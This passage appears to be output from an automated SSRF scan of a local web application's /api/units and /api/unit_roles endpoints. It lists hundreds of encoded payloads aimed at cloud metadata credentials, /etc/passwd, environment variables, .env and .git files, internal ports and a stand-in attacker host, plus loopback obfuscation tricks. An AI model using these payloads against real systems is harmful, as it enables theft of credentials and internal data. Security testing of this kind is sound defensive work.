`http://localhost:4200/api/unit_roles?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/unit_roles?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/unit_roles?url=2130706433%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235521%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=3232235777%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D%40127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D.127.0.0.1` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D%40localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%23%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=%7Bdomain%7D.localhost` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=localhost%2F%3Fd%3D%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2500%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%3F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` +- Testing: `http://localhost:4200/api/unit_roles?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/unit_roles?url=st%3A00011211aaaa` +- Testing: `http://localhost:4200/api/unit_roles?url=0%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/unit_roles?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` +## Testing endpoint: http://localhost:4200/api/units +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/units?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/units?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/units?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/units?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/units?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/units?url=127.1%3A80` +- Testing: `http://localhost:4200/api/units?url=0` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/units?url=localhost%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/units?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127` +- Testing: `http://localhost:4200/api/units?url=127.0.1.3` +- Testing: `http://localhost:4200/api/units?url=127.0.0.0` +- Testing: `http://localhost:4200/api/units?url=2130706433` +- Testing: `http://localhost:4200/api/units?url=017700000001` +- Testing: `http://localhost:4200/api/units?url=0x7f000001` +- Testing: `http://localhost:4200/api/units?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/units?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/units?url=google.com.localhost` +- Testing: `http://localhost:4200/api/units?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/units?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/units?url=2130706433%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521%2F` +- Testing: `http://localhost:4200/api/units?url=3232235777%2F` +- Testing: `http://localhost:4200/api/units?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/units?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/units?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/units?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/units?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/units?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=0%2F` +- Testing: `http://localhost:4200/api/units?url=127.1` +- Testing: `http://localhost:4200/api/units?url=127.0.1` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/units?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/units?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/units?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/units?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=127.0.1.3` +- Testing: `http://localhost:4200/api/units?url=0` +- Testing: `http://localhost:4200/api/units?url=127.1` +- Testing: `http://localhost:4200/api/units?url=127.0.1` +- Testing: `http://localhost:4200/api/units?url=localhost` +- Testing: `http://localhost:4200/api/units?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/units?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/units?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/units?url=7F000001` +- Testing: `http://localhost:4200/api/units?url=2130706433` +- Testing: `http://localhost:4200/api/units?url=6425673729` +- Testing: `http://localhost:4200/api/units?url=127001` +- Testing: `http://localhost:4200/api/units?url=127_0._0_1` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/units?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/units?url=localtest.me` +- Testing: `http://localhost:4200/api/units?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127` +- Testing: `http://localhost:4200/api/units?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/units?url=0x7f000001` +- Testing: `http://localhost:4200/api/units?url=017700000001` +- Testing: `http://localhost:4200/api/units?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/units?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/units?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/units?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/units?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/units?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/units?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/units?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/units?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254` +- Testing: `http://localhost:4200/api/units?url=2852039166` +- Testing: `http://localhost:4200/api/units?url=7147006462` +- Testing: `http://localhost:4200/api/units?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/units?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/units?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/units?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/units?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/units?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/units?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/units?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/units?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/units?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/units?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/units?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/units?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/units?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/units?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/units?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/units?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/units?url=127.0.0.0` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/units?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/units?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/units?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/units?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521` +- Testing: `http://localhost:4200/api/units?url=3232235777` +- Testing: `http://localhost:4200/api/units?url=425.510.425.510` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/units?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/units?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/units?url=instance-data` +- Testing: `http://localhost:4200/api/units?url=localhost%3A22` +- Testing: `http://localhost:4200/api/units?url=localhost%3A443` +- Testing: `http://localhost:4200/api/units?url=localhost%3A80` +- Testing: `http://localhost:4200/api/units?url=localhost%3A3389` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8000` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8001` +- Testing: `http://localhost:4200/api/units?url=localhost%3A8444` +- Testing: `http://localhost:4200/api/units?url=localhost%3A9901` +- Testing: `http://localhost:4200/api/units?url=localhost.localdomain` +- Testing: `http://localhost:4200/api/units?url=loopback` +- Testing: `http://localhost:4200/api/units?url=loopback%3A22` +- Testing: `http://localhost:4200/api/units?url=loopback%3A80` +- Testing: `http://localhost:4200/api/units?url=loopback%3A443` +- Testing: `http://localhost:4200/api/units?url=loopback%3A3389` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8000` +- Testing: `http://localhost:4200/api/units?url=loopback%3A9901` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8001` +- Testing: `http://localhost:4200/api/units?url=loopback%3A8444` +- Testing: `http://localhost:4200/api/units?url=ipcop.localdomain%3A8443` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fhostname` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Finstance%2Fid` +- Testing: `http://localhost:4200/api/units?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2Fproject%2Fproject-id` +- Testing: `http://localhost:4200/api/units?url=metadata.nicob.net` +- Testing: `http://localhost:4200/api/units?url=owasp.org.169.254.169.254.nip.io` +- Testing: `http://localhost:4200/api/units?url=ssrf-169.254.169.254.localdomain.pw` +- Testing: `http://localhost:4200/api/units?url=ssrf-cloud.localdomain.pw` +- Testing: `http://localhost:4200/api/units?url=www.owasp.org.1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/units?url=127.1%3A80` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/units?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/units?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/units?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/units?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/units?url=2130706433%2F` +- Testing: `http://localhost:4200/api/units?url=3232235521%2F` +- Testing: `http://localhost:4200/api/units?url=3232235777%2F` +- Testing: `http://localhost:4200/api/units?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/units?url=0xc0a80014%2F` 